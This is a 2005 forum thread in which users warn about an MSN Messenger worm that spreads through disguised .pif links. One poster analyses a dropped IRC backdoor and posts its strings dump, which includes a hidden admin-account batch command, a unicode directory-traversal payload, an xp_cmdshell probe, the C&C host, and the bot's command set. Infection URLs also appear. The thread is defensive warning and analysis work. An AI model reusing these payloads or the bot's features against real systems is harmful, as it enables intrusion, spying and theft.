News: MSN Virus - Do not click on link.

[s0nIc]

Hot and fresh off the kitchen....

When someone on msn sends u this link

http://home.earthlink.net/~gallery10/omg.jpg

do not accept it.

coz once u accept it, its actually

http://home.earthlink.net/~gallery10/omg.pif

i have yet to look around what it does, i will update it if its a hoax or not. but for now. avoid that link. I have just recieved a msg on MSN with same said link by an old friend. she went offline after the msg was sent. Which explains why my friend went offline after sending me the link. Simmilar cases were told to me by other people i know over MSN and IRC.

Ive had someone in IRC just told me about it recently. he also recieved the msg from someone.


UPDATE: 10 mins past

So far, all ive dug up in the past few mins is there have been several simmilar cases in the past few weeks and just today .pif masked as a .jpg and being passed around on links...

Apparently it doesnt only does .pif but it also does .exe .bat .vbs aswell.

As far as ive found out,the files automatically sends variations of itself to ur contacts and signs u off automatically...

it is the Bropia again! its spreading quick here in Australia. God we're way behind.. we gettin attacked by a worm that existed a month ago...

This is apparently same case.. just different links.

Source: http://www.computerworld.com/securit...,99524,00.html
Source: http://www.gmailforums.com/lofiversi...php/t8546.html

Ill find more..

Fix: http://securityresponse.symantec.com...oval.tool.html

[omalakai]

On the blog from F-Secure, their latest post mentions a new version of this one, called Bropha.K that came out Sunday.
The link to their blog for a little more info is here.

[thehorse13]

This is what I have:

Early AM, EST, information came about an MSN messenger worm that spread by
sending the following message: "http://home.earthlink.net/~gallery10/omg.pif lol! see it! u'll like it"

I would estimate millions got infected.

Once going to that page, the Trojan horse was downloaded onto your PC,
and in turn it downloaded three other Trojan horses, also hosted at
Earthlink.

One of them then proceeded to connect to a botnet command and control
IRC server.

Due to international cooperation between ISP's, AV companies and CERTs
on a secure and vetted drone armies and malicious web sites coordination
group (yes, I am a member of this group), all the sites and the C&C IRC server were killed by their
authoritative owner.

Taking the sites down effectively stopped the spread of the worm, and
killing the C&C assured that the infected users won't be later used as a
group for illegal purposes such as DDoS, spam, etc. We go into action
when worms go out.

This was done in a very short time, and while there were no signatures
yet for this worm from AV companies.

[mikester2]

Same here (in the uk), but with the format of

omg this is funny! http://jose.rivera4.home.att.net/cute.pif

---- DON'T CLICK IT

[tealbambino]

Got it with another message and link:
Again in the UK

"haha look at us"
"http://designoflife.net/youandme.pif"

[ammo]

Yeah, I (err, actually, my sister) got the same one as mikester2 at around 16:30 UTC-5 yesterday, but had the brilliant idea of opening it... :rolleyes:

Now, it installed a bunch of adware that was rather easiliy removed, but left two running processes:
hotkeysvc.exe
winfrw.exe

hotkeysvc is cited in the symantec and other AV vendors writeups...

winfrw.exe however I haven't seen mentionned anywhere (nor does google turn up anything).
A quick `strings` on it reveals that it seems to be an IRC botnet trojan/backdoor that amongst other things creates a user and group on the target machine, tries to connect to mssql servers with a blank SA account then execute a localhost ping with the xp_cmdshell extended stored procedure, contains a unicode encoded /script/../../cmd.exe directory traversal attempt, and such.

md5 hash of the winfrw.exe file (if anyone want's to compare):
23eabd0e6a6e5ea6ed1987eb3821c847 *winfrw.exe


Ok, here's the (interesting parts of the) actual strings output if that interests anyone:

Code:

ExitProcessExitProcess
GetModuleHandleA
GetTickCount
CloseHandle
WriteFile
CreateFileA
SetFileAttributesA
CopyFileA
SetCurrentDirectoryA
GetWindowsDirectoryA
GetModuleFileNameA
CreateThread
GetLastError
CreateMutexA
lstrlenA
lstrcmpA
GetFileAttributesA
GetVersionExA
GetSystemInfo
GlobalMemoryStatus
DeleteFileA
Sleep
ReadFile
GetFileSize
lstrcmpiA
TerminateProcess
OpenProcess
FindClose
FindNextFileA
FindFirstFileA
KERNEL32.dll
DispatchMessageA
TranslateMessage
GetMessageA
ShowWindow
CreateWindowExA
RegisterClassExA
LoadCursorA
LoadIconA
GetDesktopWindow
DefWindowProcA
SetWindowsHookExA
SetKeyboardState
SetTimer
MoveWindow
wsprintfA
GetWindowTextA
GetForegroundWindow
UnhookWindowsHookEx
PostQuitMessage
CloseWindow
CallNextHookEx
ToAscii
GetKeyboardState
GetKeyNameTextA
GetActiveWindow
DestroyWindow
SendMessageA
IsWindow
USER32.dll
DeleteObject
GetDIBColorTable
BitBlt
SelectObject
CreateDIBSection
DeleteDC
CreateCompatibleDC
GetDeviceCaps
CreateDCA
GDI32.dll
RegCloseKey
RegSetValueExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ODBC32.dll
strstr
strtok
sprintf
atol
atoi
strncpy
rand
srand
strncat
free
malloc
??3@YAXPAX@Z
??2@YAPAXI@Z
MSVCRT.dll
InternetGetConnectedState
WININET.dll
WS2_32.dll
capGetDriverDescriptionA
capCreateCaptureWindowA
AVICAP32.dll
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
MPR.dll
GetModuleBaseNameA
EnumProcesses
GetModuleFileNameExA
EnumProcessModules
PSAPI.DLL
URLDownloadToFileA
urlmon.dll
FBI.USA.GOV
/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33
e%65%78%65?/c+
SysCfg
Explorer
PRIVMSG %s :%s
hak-
open
@echo off
net user /add System hakt
net localgroup /add Administrators System
del %0
temp.bat
Windows System Configuration
\WINFRW.EXE
USER %s %s %s :%s
NICK %s
QUIT :Received WM_ENDSESSION message.
QUIT :Received WM_QUIT message.
QUIT :Received WM_QUERYENDSESSION message.
#komo
bo.timzoz.net
88FinalSolution88
Windows Security Updater
Software\Microsoft\Windows\CurrentVersion\Run
QUIT :Received WM_DESTROY message.
QUIT :Received WM_CLOSE message.
PONG %s
PING
PRIVMSG %s :Version %d.%d (%s). Your mother sucks **** in hell.
version
random
icmp
PRIVMSG %s :Active window: %s.
active
PRIVMSG %s :File not found.
send
exec
PRIVMSG %s :Connected to IRC for: %d day(s), %d hour(s), and %d m
PRIVMSG %s :System Uptime: %d day(s), %d hour(s), and %d minute(s
uptime
PRIVMSG %s :OS: Windows %s. IP: %d.%d.%d.%d. Memory: %d/%dMB. CPU
 processor(s). Uptime: %d day(s), %d hour(s), and %d minute(s).
%s (%s)
2000
sysinfo
PRIVMSG %s :Error while executing file.
PRIVMSG %s :File executed.
PRIVMSG %s :Error while downloading file.
PRIVMSG %s :File downloaded.
PRIVMSG %s :Downloading %s to %s...
klolol
PRIVMSG %s :Error while capturing amateur video from webcam.
PRIVMSG %s :Amateur video saved to %s.
video
PRIVMSG %s :Error while capturing from webcam.
PRIVMSG %s :Webcam capture saved to %s.
frame
PRIVMSG %s :Capture driver #%d - %s - %s.
drivers
PRIVMSG %s :Error while capturing screen.
PRIVMSG %s :Screen capture saved to %s.
screen
capture
PRIVMSG %s :KeySpy disabled.
PRIVMSG %s :KeySpy enabled.
PRIVMSG %s :KeySpy already enabled.
keyspy
PRIVMSG %s :Spoof IP set to '%s'.
PRIVMSG %s :'%s' is an invalid IP address (it's not hard).
%d.%d.%d.*
PRIVMSG %s :Spoofing currently set to '%s'.
PRIVMSG %s :Spoofing disabled.
spoof
PRIVMSG %s :Unable to resolve host.
PRIVMSG %s :Resolved %s to %s.
PRIVMSG %s :Unable to delete %s.
PRIVMSG %s :%s has been deleted.
delete
pscan
PRIVMSG %s :Can't resolve IRC server.
PRIVMSG %s :Connecting clone to %s[:%s].
PRIVMSG %s :Max clones reached.
load
PRIVMSG %s :Clones killed.
kill
clone
PRIVMSG %s :Enable password set to '%s', bot disabled.
disable
PRIVMSG %s :Password accepted, commands enabled.
enable
PRIVMSG
PRIVMSG %s :Initializing DCC console...
CHAT
PRIVMSG %s :Downloading '%s' through DCC (%d bytes)...
PRIVMSG %s :CreateFile() failed.
SEND
PRIVMSG %s :DCC resume is not supported (yet).
RESUME
JOIN %s %d
PONG %s
JOIN %s
Enter
Backspace
PRIVMSG %s :
%d(KeySpy) %s
(%s)
PRIVMSG %s :Error sending packets to %s. eax=SOCKET_ERROR, WSAGet
 sizeof(buffer) = %d. Packets sent sucessfully = %d.
PRIVMSG %s :Finished sending packets to %s. Sent %d packet(s). ~%
t (~%dK/s).
%d.%d.%d.%d
PRIVMSG %s :Sending packets to %s...
PRIVMSG %s :Invalid target IP.
PRIVMSG %s :Error calling setsockopt(). WSAGetLastError() returns
PRIVMSG %s :Error calling socket().
PRIVMSG %s :You cant send packets for 0 seconds.
PRIVMSG %s :Received %s (%d bytes).
PRIVMSG %s :connect() failed.
PRIVMSG %s :socket() failed.
PRIVMSG %s :Sent %s to %s. (%d bytes).
PRIVMSG %s :send() failed.
PRIVMSG %s :Transfer accepted, sending...
PRIVMSG %s :accept() failed.
PRIVMSG %s :DCC send timed out.
PRIVMSG %s :
DCC SEND %s %d %d %d
NOTICE %s :DCC Send %s (%s)
PRIVMSG %s :Sending file to %s...
PRIVMSG %s :bind() failed.
DISPLAY
Window
PRIVMSG %s :Unicode vulnerable server on %s.
HTTP/1.0 200 OK
HTTP/1.1 200 OK
GET %sdir HTTP/1.1
Connection: close
PRIVMSG %s :SQL server with open 'sa' account on %s.
xp_cmdshell 'ping 127.0.0.1'
%s%s%s
DRIVER={SQL Server};SERVER=
;UID=sa;PWD=
%s.%d
%s.%d.%d
PRIVMSG %s :IP range scan complete.
PRIVMSG %s :Open port found on %s[:%d].
%s.%d.%d.%d
PRIVMSG %s :IP range scan started...
PRIVMSG %s :DCC console closed.
EnumProcesses() failed.
Error while killing process.
Syntax: process kill <pid>.
Error while enumerating modules.
Syntax: process modules <pid>.
Sub-commands of 'process':
  list, kill, modules.
End of process list.
%s - %d.
unknown
Number of active processes: %d.
list
Process terminated.
End of module list.
%s (0x%08X)
Listing modules...
modules
process
End of directory list.
<%s>
Listing Directory: %s.
Error while deleting file.
File deleted.
Error while copying file.
File copied.
copy
Sub-commands of 'file':
  dir.
file
End of network list.
enumerate
Sub-commands of 'network':
  enumerate.
network
  file, process, network.
Available commands:
help
Welcome to the Wisdom DCC console.
Current system uptime: %d day(s), %d hour(s) and %d minute(s).
PRIVMSG %s :DCC console activated.

The process also opens and listens on ports tcp 559 and udp 123, but connecting with netcat on them doesn't return anything (and I can't seem to coax it to return any message by sending it stuff).

Now AFAIK this does look like a gabot or spybot variant (I think), but on virustotal.com, only the following vendors detected it (as of the time of this post):

This is a report processed by VirusTotal on 03/08/2005 at 01:22:19 (CET)after scanning the file "WINFRW.EXE" file.
Antivirus Version Update Result
AntiVir 6.30.0.5 03.07.2005 BDS/Wisdoor.K
AVG 718 03.07.2005 no virus found
BitDefender 7.0 03.07.2005 BehavesLike:Win32.IRC-Backdoor
ClamAV devel-20050130 03.08.2005 Trojan.Wisdoor-6
DrWeb 4.32b 03.07.2005 no virus found
eTrust-Iris 7.1.194.0 03.07.2005 no virus found
eTrust-Vet 11.7.0.0 03.07.2005 no virus found
Fortinet 2.51 03.08.2005 no virus found
F-Prot 3.16a 03.07.2005 no virus found
Ikarus 2.32 03.07.2005 no virus found
Kaspersky 4.0.2.24 03.08.2005 Backdoor.Win32.Wisdoor.av
NOD32v2 1.1021 03.07.2005 probably unknown NewHeur_PE virus
Norman 5.70.10 03.07.2005 no virus found
Panda 8.02.00 03.07.2005 W32/Gaobot.DLA.worm
Sybari 7.5.1314 03.08.2005 W32/Sdbot.worm.gen
Symantec 8.0 03.07.2005 no virus found

Yesterday only 4 vendors detected it (antivir, clamav, Kaspersky, NOD32v2)

I also sent the file to symantec (which I use) and isc.sans.org...

The good news is that the link it was downloaded from was quickly disabled and returned a code 500 around midnight already.


Ammo

[gore]

Originally posted here by mikester2
Same here (in the uk), but with the format of

omg this is funny! [ u rl ] http://jose.rivera4.home.att.net/cute.pif [ / url]

---- DON'T CLICK IT

Perhaps you could edit this message of yours and select NOT to parse URLs?

" Automatically parse URLs: automatically adds [ url ] and [ /url ] around internet addresses. "

That one.

Not that this link can really do a thing to me but someone else could accidently click on it while scrolling the text and trying to scroll back down or something.

[ammo]

That link doesn't actually work anymore, it returned a code 500 last night and is now explicitly forbidden (403)... (Although I agree that not parsing it is a good thing)

Ammo

[xierox]

These look to be variants of the W32.Kelvir virus (also called Bropia as s0nic stated). These are the four variants that Symantec lists.

http://securityresponse.symantec.com....kelvir.a.html
http://securityresponse.symantec.com....kelvir.b.html (this one has a S.S.)
http://securityresponse.symantec.com....kelvir.c.html
http://securityresponse.symantec.com....kelvir.d.html

- Xierox

[ammo]

Ok, I just got a reply from Symantec concerning my file submission: it was assigned the new designation Backdoor.Solufina

This message is an automatically generated reply. This system is designed to analyze and process virus submissions into the Symantec Security Response and cannot accept correspondence or inquiries.
Please contact your Technical Support representative if more detailed information about your submission is required. Do not reply to this message.

Below is a status update on your virus submission:

Date: March 7, 2005

<ammo>



Dear <ammo>,

We have analyzed your submission. The following is a report of our
findings for each file you have submitted:

filename: E:\Users\ammo\forensics\WINFRW.EXE
machine:
result: This file is infected with Backdoor.Solufina

Developer notes:
E:\Users\ammo\forensics\WINFRW.EXE is non-repairable threat. Please delete this file and replace it if necessary. Please follow the instruction at the end of this email message to install the latest rapidrelease definitions.

Symantec Security Response has determined that the sample(s) that you provided are infected with a virus, worm, or Trojan. We have created RapidRelease definitions that will detect this threat. Please follow the instruction at the end of this email message to download and install the latest RapidRelease definitions.
Symantec is now building a new set of definitions to include the threat you have submitted. The approximate time to complete this process is one hour. We recommend checking the ftp site periodically over the next 60 to 90 minutes to download these definitions as soon as they are available.

Downloading and Installing RapidRelease Definitions:
1. Open your Web browser. If you are using a dial-up connection, connect to any Web site, such as: http://securityresponse.symantec.com/
2. Copy and paste the address ftp://ftp.symantec.com/public/englis...ease/sequence/ into the address bar of your Web browser and then press Enter.(this could take a minute or so if you have a slow connection)
3. Now select 41880 folder or a higher. Open the folder.
4. Select the file symrapidreleasedefsi32.exe
5. When a download dialog box appears, save the file to the Windows desktop.
6. Double-click the downloaded file and follow the prompts.

----------------------------------------------------------------------
This message was generated by Symantec Security Response automation

Should you have any questions about your submission, please contact
our regional technical support from the Symantec website
(http://www.symantec.com/techsupp/)
and give them the tracking number in the subject of this message.



--------------------------------------------

Since it seems to be a new backdoor (or at least variation) I guess I should go double check that the IRC server the binary tries to connect to is informed/shutdown...


Ammo